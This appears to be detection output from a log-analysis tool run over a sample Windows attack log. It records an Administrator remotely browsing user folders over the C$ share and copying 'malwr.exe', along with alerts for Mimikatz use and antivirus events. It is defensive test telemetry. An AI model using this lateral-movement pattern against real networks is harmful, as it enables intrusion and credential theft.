+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user02\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user03\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user04\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: ui\SwDRM.dll  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: malwr.exe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
